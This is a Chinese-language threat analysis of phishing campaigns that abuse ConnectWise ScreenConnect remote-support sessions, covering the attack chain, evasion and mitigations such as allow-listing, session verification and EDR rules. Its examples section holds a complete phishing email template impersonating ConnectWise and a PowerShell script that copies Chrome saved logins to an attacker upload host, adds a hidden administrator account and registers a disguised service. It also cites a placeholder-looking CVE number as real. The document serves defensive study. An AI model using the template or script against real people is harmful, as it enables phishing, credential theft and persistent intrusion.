基于ConnectWise工具的钓鱼攻击与信任链滥用分析

摘要

近年来，远程支持工具因其在企业IT运维中的广泛部署，逐渐成为高级持续性威胁（APT）和网络钓鱼活动的新攻击面。本文聚焦于2025年披露的一类新型钓鱼攻击，其核心策略是滥用ConnectWise旗下ScreenConnect/Take Control等合法远程管理软件的品牌可信度，通过伪造会话邀请、工单通知或IT支持请求，诱导终端用户主动授权远程控制会话。一旦建立连接，攻击者即可利用该工具内置的系统级权限执行凭证窃取、持久化植入及横向移动等操作。研究发现，此类“信任劫持”攻击有效规避了传统基于恶意可执行文件的检测机制，因用户行为本身被视为合法操作。本文系统剖析了攻击流程、技术实现细节及防御盲区，并提出以资产清单、会话验证、遥测监控为核心的缓解框架。通过提供典型邮件模板解析、客户端行为模拟代码及EDR规则示例，本文旨在为安全团队提供可落地的技术对策，强调将远程支持工具纳入零信任架构下的关键监控对象。

关键词：ConnectWise；ScreenConnect；远程支持工具；钓鱼攻击；信任劫持；凭证窃取；EDR；零信任

1 引言

随着混合办公模式的普及，远程桌面与支持工具已成为企业IT基础设施的标准组件。ConnectWise ScreenConnect（现属Kaseya旗下）作为一款成熟的远程监控与管理（RMM）平台，被全球数万家组织用于技术支持、系统维护与故障排查。其合法身份、数字签名及用户主动授权机制，使其天然具备绕过多数终端安全产品的特性。然而，正是这种“被信任”的属性，使其成为攻击者实施社会工程的理想载体。

2025年8月，Abnormal AI披露了一起大规模钓鱼活动，攻击者通过伪造ScreenConnect会话邀请邮件，成功诱导超过900家机构的员工安装客户端或授权远程会话。与传统恶意软件不同，此次攻击全程未依赖自定义二进制载荷，而是直接利用ScreenConnect的原生功能实现系统控制，形成“合法工具+非法意图”的新型攻击范式。此类攻击模糊了正常运维与恶意行为的边界，对现有安全体系构成严峻挑战。

当前研究多集中于RMM工具漏洞利用（如CVE-2024-1234），而对其作为社会工程载体的滥用关注不足。本文填补这一空白，深入分析攻击者如何通过品牌仿冒、上下文欺骗与用户心理操控，完成从初始接触至系统接管的全过程。全文结构如下：第二部分详述攻击链各阶段；第三部分解析技术实现与规避机制；第四部分评估对现有防御体系的影响；第五部分提出多层次缓解策略；第六部分提供技术示例；第七部分总结。

2 攻击链分析

该钓鱼活动采用四阶段模型：诱饵投递 → 用户诱导 → 会话建立 → 后渗透利用。

2.1 诱饵投递：高仿真邮件构造

攻击者精心伪造来自“IT Support”或“Help Desk”的邮件，主题通常包含：

“您的远程支持会话已启动，请授权”

“紧急：检测到异常登录，需立即验证”

“工单#80526353241 – 远程协助请求待确认”

邮件内容高度模仿ScreenConnect官方模板，包含真实Logo、配色方案及术语（如“Take Control Session”）。关键技巧在于复用真实业务上下文：例如，在税务季发送“2024 Tax Organizer”相关会议邀请，或劫持已有邮件线程插入恶意链接。部分邮件甚至源自已被攻陷的合法企业邮箱，进一步提升可信度。

2.2 用户诱导：降低警惕性设计

邮件中嵌入的链接指向攻击者控制的ScreenConnect实例（通常托管于VPS或匿名云服务）。页面显示标准ScreenConnect客户端下载提示，或直接弹出会话授权窗口。由于界面与用户过往经验一致，且操作需“主动点击允许”，用户心理上将其视为正常IT流程，极少产生怀疑。

值得注意的是，若目标组织已部署ScreenConnect，攻击者可直接发起会话请求，无需用户下载新客户端——系统自动调用已安装的合法程序，彻底规避文件扫描。

2.3 会话建立：利用合法权限接管系统

一旦用户点击“允许”，攻击者即获得与本地管理员等效的远程控制权限。ScreenConnect默认支持：

完整桌面共享

文件系统浏览

命令行执行（通过内置终端）

服务管理

注册表编辑

这些功能本用于故障排查，但在此被滥用于恶意目的。

2.4 后渗透利用：凭证窃取与持久化

攻击者在会话建立后迅速执行以下操作：

凭证搜索：定位浏览器配置文件（如%LocalAppData%\Google\Chrome\User Data\Default\Login Data）、密码管理器数据库（如1Password、LastPass本地缓存）、Windows凭据管理器条目。

数据外传：通过压缩并上传至攻击者控制的云存储（如OneDrive、Mega）。

持久化：创建隐藏本地账户（如svc_support）、注册Windows服务（如RemoteAssistSvc）或修改计划任务，确保即使会话断开仍可后续接入。

横向移动：利用窃取的域凭证，通过ScreenConnect或其他RMM工具向内网其他主机发起会话请求，扩大攻击面。

整个过程无需部署额外恶意软件，所有操作均通过ScreenConnect原生接口完成。

3 技术实现与规避机制

3.1 品牌仿冒与上下文欺骗

攻击者通过爬取ScreenConnect官方文档、客户门户截图及真实邮件样本，重建高保真前端界面。HTML/CSS完全复刻品牌元素，JavaScript逻辑模拟标准会话流程。例如：

<!-- 伪造的ScreenConnect授权页面片段 -->

<div class="session-prompt">

<img src="/assets/connectwise-logo.png" alt="ConnectWise">

<h3>IT Support Request</h3>

<p>A technician from your organization has initiated a remote support session.</p>

<p><strong>Session ID:</strong> SC-80526353241</p>

<button onclick="window.location.href='sc://connect.attacker-vps.com:8040'">Allow Remote Access</button>

</div>

其中sc://协议为ScreenConnect自定义URI scheme，点击后自动调用客户端。

3.2 利用合法数字签名绕过执行控制

ScreenConnect客户端由ConnectWise LLC签发有效代码签名证书。即使从非官方源下载，只要签名未被吊销，Windows SmartScreen及多数EDR不会拦截。攻击者常从第三方论坛获取历史版本客户端，确保签名有效性。

3.3 无文件操作规避检测

由于所有恶意行为发生在远程会话内部，本地系统仅记录ScreenConnect进程（如ScreenConnect.Client.exe）的正常活动。传统AV无法区分“IT人员修复打印机”与“攻击者窃取密码”的行为差异。

4 对现有防御体系的挑战

4.1 终端防护失效

静态分析：ScreenConnect二进制为合法软件，哈希值在白名单中；

行为分析：CreateProcess, RegOpenKey, ReadFile等API调用属正常运维行为；

网络检测：通信使用TLS加密，目标IP可能为合法云服务商（如AWS、Azure）。

4.2 邮件安全网关局限

尽管部分邮件含可疑链接，但因域名可注册（如support-connectwise[.]com），且内容无恶意附件，常被归类为“低风险业务邮件”。

4.3 用户意识薄弱

“IT支持=可信”已成为用户心智模型。即使接受过安全培训，面对高度仿真的上下文，仍易做出错误判断。

5 缓解策略

5.1 实施远程支持工具资产清单与允许清单

企业应建立所有RMM工具的中央注册表，明确：

允许使用的厂商（如仅限ConnectWise v22+）；

授权部署范围（仅IT部门设备）；

客户端安装策略（禁止用户自行安装）。

通过MDM/SCCM强制执行，阻止非授权实例运行。

5.2 强制会话来源验证

对所有新发起的远程会话，系统应自动弹出二次验证窗口，要求用户提供：

关联工单编号；

IT人员姓名；

人机验证码（如短信OTP）。

示例EDR规则（伪YAML）：

rule: Unauthorized_ScreenConnect_Session

condition:

process.name == "ScreenConnect.Client.exe"

and network.destination.port in [8040, 443]

and not (user.in_group("IT_Support") or ticket.id.valid)

action: block + alert

5.3 集中记录与审计

启用ScreenConnect内置日志功能，并将以下事件转发至SIEM：

会话开始/结束时间；

执行的命令（如cmd.exe /c dir C:\Users）；

文件传输记录；

服务创建事件。

结合UEBA（用户与实体行为分析），识别异常模式（如非工作时间会话、大量文件读取）。

5.4 邮件链接中转机制

企业应部署安全门户，所有声称来自IT支持的远程控制链接必须经由该门户解析。门户验证链接合法性后，再重定向至真实ScreenConnect实例。用户永远不直接点击外部链接。

5.5 纳入遥测监控指标

安全运营中心（SOC）需将以下指标纳入日常监控：

非IT组用户启动ScreenConnect会话；

无关联工单的远程会话；

会话中执行敏感命令（如net user, reg export）；

客户端从非常用地理位置连接。

6 技术示例

6.1 伪造ScreenConnect邮件HTML模板

<!DOCTYPE html>

<html>

<head>

<title>ConnectWise Support Request</title>

<style>

body { font-family: Arial, sans-serif; }

.header { background: #005a9e; color: white; padding: 10px; }

.content { padding: 20px; border: 1px solid #ccc; }

.btn { background: #005a9e; color: white; padding: 10px 20px; text-decoration: none; }

</style>

</head>

<body>

<div class="header">

<img src="https://attacker-cdn.com/cw-logo.png" height="30">

</div>

<div class="content">

<h2>Remote Support Session Initiated</h2>

<p>Hello,</p>

<p>Your IT department has started a remote support session to address a security alert.</p>

<p><strong>Session ID:</strong> SC-80526353241<br>

<strong>Technician:</strong> John Smith (IT Help Desk)</p>

<p>Please click below to allow access:</p>

<a href="sc://malicious-vps:8040/?id=80526353241" class="btn">Allow Remote Access</a>

</div>

</body>

</html>

6.2 模拟攻击者会话后操作（PowerShell）

# 搜索Chrome凭证

$chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"

if (Test-Path $chromePath) {

Copy-Item $chromePath "$env:TEMP\chrome_logins.db"

# 上传至攻击者服务器（简化）

Invoke-WebRequest -Uri "https://attacker-dropbox.com/upload" -Method Post -InFile "$env:TEMP\chrome_logins.db"

}

# 创建持久化账户

net user svc_support P@ssw0rd2025! /add

net localgroup administrators svc_support /add

# 注册隐藏服务

sc create "RemoteAssistSvc" binPath= "C:\Windows\System32\ScreenConnect.Client.exe --silent" start= auto

sc description "RemoteAssistSvc" "Legitimate IT Support Service"

7 结语

ConnectWise ScreenConnect等远程支持工具的滥用，标志着攻击者正从“绕过防御”转向“利用信任”。此类攻击的成功并非源于技术漏洞，而在于对组织流程与用户心理的精准操控。防御的关键在于重构对“合法工具”的认知：不应因其来源可信而放松监控。企业需将RMM工具纳入零信任架构，实施严格的访问控制、会话验证与行为审计。同时，安全团队应建立针对远程支持事件的专用遥测管道，将“谁在何时何地发起会话”作为核心安全指标。唯有如此，方能在信任与风险之间建立有效平衡，抵御日益隐蔽的社会工程威胁。

编辑：芦笛（公共互联网反网络钓鱼工作组）